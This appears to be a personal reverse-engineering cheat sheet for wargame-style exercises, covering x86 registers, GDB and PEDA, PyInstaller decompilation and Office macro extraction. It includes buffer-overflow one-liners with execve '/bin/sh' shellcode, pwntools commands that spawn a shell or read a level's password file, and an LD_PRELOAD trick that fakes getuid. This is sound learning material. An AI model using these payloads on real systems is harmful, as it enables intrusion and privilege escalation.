ReverseEngineering

---

• ASM

• Binary ninja

• Decompile Python Executable

• GDB

• Lib Injection

• Macro Office PPTM

• OverFlow

• Shellcode

ASM

Variables

x64	x32	What is ?
RAX	EAX	Return Value
RCX	ECX	Counter (or Fourth Arg)
RDX	EDX	Third Arg
RSI	ESI	Second Arg
RDI	EDI	First Arg of Function
RSP	ESP	Stack Pointer
RIP	EIP	Next Instruction
R8-R11	r8d-r11d	Scratch register
R12-R15	r12d-r15d	Preserved register

Source

Operation

Operation	Explication
MOV size dest,src	dest ← src
LEA dest,[op]	dest ← addr op
PUSH op	Increase RSP & Store op
POP op	Load op & Discrease RSP
ADD op1,op2	op1 ← op1 + op2
SUB op1,op2	op1 ← op1 - op2
NEG reg	reg ← -reg
INC reg	reg ← reg + 1
DEC reg	reg ← reg - 1
AND op1,op2	op1 ← op1 & op2
OR op1,op2	op1 ← op1
XOR op1,op2	op1 ← op1 ^ op2
CMP op1,op2	op1 - op2
TEST op1,op2	op1 & op2
JMP op	Jump to op

Source - Page 21

Overflow

Basic

(python -c "import struct; print('A' * (100 - 0) + struct.pack('<I', 0xffffffff))")

Shellcode

(python -c "import struct; print('\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80' + 'A' * (100 - 21) + struct.pack('<I', 0xffffffff))")

Shellcode

Cat

python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.cat('/home/users/level05/.pass')); print(shell); print(len(shell))"

Exec sh 1

python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.sh()); print(shell); print(len(shell))"

Exec sh 2

\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
21

GDB

Command

b *0x12345678      # Breakpoint
b strcpy           # Breakpoint
r                  # Run program
r < <(echo lol)    # Run with pipe
r arg1 arg2        # Run with arg
c                  # Continue
n                  # Next operation
set $eax=0x00      # Set variable
info register      # Show Register

Print

x/s "string"
x/d 53
x/x 0xff
help x

print $rax

• Gdb cheatsheet - gabriellesc

• Gdb cheatsheet - darkdust

Get env address

x/10s **(char***)&environ

Peda

Install

git clone https://github.com/longld/peda.git ~/.peda
echo "source ~/.peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"

Binary ninja

Scrap code from html

let result = '';
[...document.querySelectorAll('.LinearDisassemblyLine')].forEach(parent_elmt => {
  [...parent_elmt.children].forEach(children_elmt => {
    result += children_elmt.textContent
  });
  result +=  '\n'
});
console.log(result);

Lib Injection

• Recreate getuid function

uid_t	getuid(void)
{
	return (4242);
}

• compile

gcc -shared -fpic lib.c -o libnike.so -m32

• run and inject

LD_PRELOAD=./libnike.so ./exec

Decompile Python Executable

Convert executable into .pyc

git clone https://github.com/extremecoders-re/pyinstxtractor
cd pyinstxtractor
python3 pyinstxtractor.py exec

Disassembly .pyc (compatible python 3.9.2)

git clone https://github.com/zrax/pycdc
cd pycdc
cmake
make
./pycdc file.pyc # Convert .pyc into .py
./pycdas file.pyc # Convert .pyc into byte-code disassembly

Macro Office PPTM

Install

sudo pip3 install oletools

Decompress PPTM

olevba  -c file.pptm

• ViperMonkey